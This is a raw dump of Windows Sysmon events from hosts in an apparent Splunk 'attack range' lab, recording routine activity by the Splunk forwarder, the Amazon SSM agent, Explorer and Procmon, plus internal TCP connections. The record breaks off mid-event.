Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E25F869267F16A92F7B2E39DDBF494A1,SHA256=AE5458E704ACC302F8967EE7F3B15A21CF4D5522131B77E4EC6DAFE12CBAFEDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:09.567{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:09.567{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:09.567{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:09.567{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:09.567{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:09.567{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:09.536{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D03D5F3EBD81234C36C494DDF48FCD78,SHA256=3C76F83F24F7555D37A400777799CD2651D3A79FAA3F172142E0676DCA2E2372,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:10.877{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA638E121F26C99F201658412A6FE507,SHA256=F1DB864A81F4439D0E4CD81415C3BCEA025175EC2521E017FFFD4BE78A7CEB80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:10.822{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-169MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:10.552{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18844A37035955612C7A74EAF75CB49D,SHA256=6274D4BA92E597011796B7291AF809071D9AD91A391DCCCBE5C5ECF7251C6CB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:11.908{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C6E0CE38665D9352C80EB52EA018BCB,SHA256=EA43285EAABF7B9888EFAF4E516E12E696C3F8BAF1ABCE8667041EB7E3428F08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:11.823{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-170MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:11.597{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6149A8414622B8329DC0760E2165F157,SHA256=91CE34CA6568A39D7E7ED92D6CCCE519535377FCDFFA737D71C18872597F364C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:12.923{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4CF5BD612C9431C1953502E60D8F2F3,SHA256=FE5C933ABD4B03701111F022B2A6C9EA46F7C3EBC545CB5F62ADDB40B2F4D8C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:12.608{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AFFE5EDF4D264DCEE4F28E79C564CCF,SHA256=D4A03FC835F8F7442F625E911279D73C981942551114FB428DC2B9652B03DEFA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:10.552{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51768-false10.0.1.12-8000- 23542300x8000000000000000223193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:13.939{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B06DEBB575292431F8A5078E21BC10D1,SHA256=FACD9DAAD2A8C973359D4DDDA2B70C0E035452ADEACE467DC7BD878B6673C17B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:13.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D748D07F510DE8A7520AD41BFDCD56A0,SHA256=BCF32BAA7880826093A2332DF52BC9B74F42313804A56F2FAF16788C5019A175,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:11.706{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49605-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:14.628{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A867839258769B2FCCCBF78F63C7581,SHA256=F9475DBB5EBA58C0FA3541FE15949A31B8EF3CEF99A4CC0F613A63EBE290E38B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:15.647{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E0940B2F5F00947D5F3928E08C7A130,SHA256=DD6D5E9F512C4BB2F969F0A33296680608A300143BABB0222955B50B48DB6E36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:15.002{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=061AF80BC4A14807368899F73CD27710,SHA256=87FB6715053EBE3214E12512F72DDF0F060F4C532B73FE16E5BD5E8ECF67D8CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:16.658{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCCA24D613079F88C8878C7BCE8D07C3,SHA256=316535F78C7F68FC4A5A08CACBF972F252CAA91A553DC787E7260FDA46F71063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:16.033{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1BD29DAD539C19EBCF63A0C690FC81E,SHA256=6192501CE4D56F7789ABEB893A1D26E5C458EC482F879AD955288A371BE61387,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:17.664{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9277D83DACC7EA104B70E79ECE12F5D,SHA256=A7AAB93AB3870EF968BA60D3A5664D5AECEE101B4DE0E88450595CF8B2DA1BFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:17.064{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=586777F0C9ABA35E3472B3C11D3CA7A2,SHA256=DA260D5C30546F4FEC719415524F05C2F89ACE88FDA6EDC12964D061F171FBCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:18.672{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87A9FC615D7CB0C7B490CD4DE74B0B1D,SHA256=9DD5FB04A9079082E56E8F646CD65DAF6A7522D466F9544E0D1CA33B2EE18535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:18.126{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AECA28D6BDE6A9586438157431E83D2,SHA256=1E54C4D083ACAC986C0251F60C0E81F576592E2FD4B8B4C5CD9EB9300B5CFA61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.755{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A17-6216-7A07-000000003802}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.755{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.755{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.755{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.755{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.755{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1A17-6216-7A07-000000003802}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.755{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A17-6216-7A07-000000003802}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.757{C8EA50B7-1A17-6216-7A07-000000003802}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:19.740{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D08F8C72FABB618F8BE31C292B548FB1,SHA256=E75BC74CCCD64755798AB3DFA4926DBB99022E81F80AF52BF8818615D49A01B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:16.552{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51769-false10.0.1.12-8000- 23542300x8000000000000000223199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:19.142{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 